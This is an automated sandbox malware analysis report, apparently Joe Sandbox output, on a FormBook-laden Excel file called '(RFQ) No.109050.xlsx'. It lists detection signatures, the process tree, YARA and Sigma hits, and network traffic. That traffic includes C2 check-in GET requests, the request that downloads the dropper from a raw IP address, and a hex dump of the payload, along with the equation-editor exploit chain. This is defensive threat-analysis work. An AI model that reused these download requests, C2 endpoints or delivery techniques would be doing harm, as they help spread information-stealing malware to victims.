

Windows Analysis Report (RFQ) No.109050.xlsx

Overview

General Information

Sample Name: (RFQ) No.109050.xlsx
Analysis ID: 483690
MD5: 34cc835409afb805f20b811796d3b1fd
SHA1: 90b0fe9c48bb9915e2202e905baa3029ebc6f541
SHA256: bb916fab1615d4fab5ba566bd01d7d89eb13c586d8ece170b556f7fc8437658c
Tags: Formbook, VelvetSweatshop, xlsx

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1256 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2916 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2028 cmdline: 'C:\Users\Public\vbc.exe' MD5: A3F424F32B637CB917E6596FAE56E401)
      • vbc.exe (PID: 1292 cmdline: C:\Users\Public\vbc.exe MD5: A3F424F32B637CB917E6596FAE56E401)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 2920 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 3044 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.afishin.com/r48a/"], "decoy": ["xyhsky.com", "gervitahomecare.net", "themanibox.com", "fb-swap-sales-item.club", "westbigsimple.com", "parentingwithpower.com", "dermanddoses.com", "corpmat.com", "pochakonkatu.com", "greenbeardcreative.com", "lianhuang.net", "metalcrow.jewelry", "abayti.com", "cthongkong.com", "lantekautomation.com", "suenospremonitorios.website", "tuningyan.xyz", "thorntonbrothersconcretefl.com", "chsbubblybar.com", "leben-mit-alzheimer.net", "a3dente.store", "aubergetoitrouge.com", "zoomaremote.com", "dabanse.info", "why-vote.com", "aashvigroup.com", "norfild.com", "amcon.mobi", "limbiks.com", "bestmubai.com", "protechub.com", "dashentsolserver.com", "familydoctorrecruitment.com", "ahistudio.com", "307baymavi.com", "grem75.com", "guidetouring.com", "xdg.cool", "bayatecc.com", "boxtobookshelf.com", "abogadosgl.com", "cubeoracle.com", "hunnyslove.com", "aerocrewpk.com", "balanceonewellness.com", "darrenshoponline.com", "almarufisa.com", "jasonsmorgan.com", "itorisuujuku.com", "tclrmnc.com", "hansel-design.com", "youresolush.com", "montageafricalifestyle.com", "conversoo.com", "gainesvillewineshop.com", "wildeuk.com", "thevendorplug.com", "ratteng.com", "chixiangkj.com", "m-fasting.com", "ojaih20.com", "best-product24.com", "ecoxax.com", "89800456.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 198.12.84.109, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2916, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2916, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2916, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2028
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2916, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2028

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp; Malware Configuration Extractor: FormBook (configuration identical to the Malware Configuration section above)
Multi AV Scanner detection for submitted file
Source: (RFQ) No.109050.xlsx; ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match; File source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7; Avira URL Cloud: Label: malware
Source: www.afishin.com/r48a/; Avira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; Joe Sandbox ML: detected
Source: 7.2.vbc.exe.400000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
Source: Binary string: RAServer.pdb source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
Source: global traffic; DNS query: name: www.hansel-design.com
Source: C:\Users\Public\vbc.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 4x nop then pop edi
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 198.12.84.109:80
Source: excel.exe; Memory has grown: Private usage: 4MB later: 69MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: www.corpmat.com
Source: C:\Windows\explorer.exe; Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe; Network Connect: 144.217.61.66 80
Source: C:\Windows\explorer.exe; Domain query: www.boxtobookshelf.com
Source: C:\Windows\explorer.exe; Domain query: www.hansel-design.com
Source: C:\Windows\explorer.exe; Domain query: www.aubergetoitrouge.com
Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe; Network Connect: 75.2.89.208 80
Source: C:\Windows\explorer.exe; Domain query: www.afishin.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.afishin.com/r48a/
Source: Joe Sandbox View; ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View; ASN Name: OVHFR OVHFR
Source: global traffic; HTTP traffic detected: GET /r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1 | Host: www.aubergetoitrouge.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1 | Host: www.corpmat.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1 | Host: www.afishin.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1 | Host: www.boxtobookshelf.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View; IP Address: 198.12.84.109 198.12.84.109
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 15 Sep 2021 09:41:57 GMT | Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22 | Last-Modified: Wed, 15 Sep 2021 04:42:06 GMT | ETag: "83800-5cc0151fdab7b" | Accept-Ranges: bytes | Content-Length: 538624 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 c9 dd 9e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2e 08 00 00 08 00 00 00 00 00 00 6a 4d 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 4d 08 00 4f 00 00 00 00 60 08 00 f4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 08 00 0c 00 00 00 fc 4c 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 2d 08 00 00 20 00 00 00 2e 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f4 05 00 00 00 60 08 00 00 06 00 00 00 30 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 08 00 00 02 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 4d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 1c 5f 01 00 03 00 00 00 6f 00 00 06 ac 9e 01 00 50 ae 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 0
Source: global traffic; HTTP traffic detected: GET /cmd/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 198.12.84.109 | Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 198.12.84.109 (reported 50 times)
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.482845859.0000000003E50000.00000002.00020000.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3
Source: 45F1FF87.emf.0.dr; String found in binary or memory: http://www.day.com/dam/1.0
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45F1FF87.emf
Source: unknown; DNS traffic detected: queries for: www.hansel-design.com

        E-Banking Fraud:

        barindex
        Yara detected FormBook
        Source: Yara match | File source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        Source: Screenshot number: 8 | Screenshot OCR: Enable Editing from the 18 , yellow bar above 19 This document is 20 3 Once you have enabled ed
        Office equation editor drops PE file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
        .NET source code contains very large strings
        Source: vbc[1].exe.4.dr, Forms/mainForm.cs | Long String: Length: 38272
        Source: vbc.exe.4.dr, Forms/mainForm.cs | Long String: Length: 38272
        Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs | Long String: Length: 38272
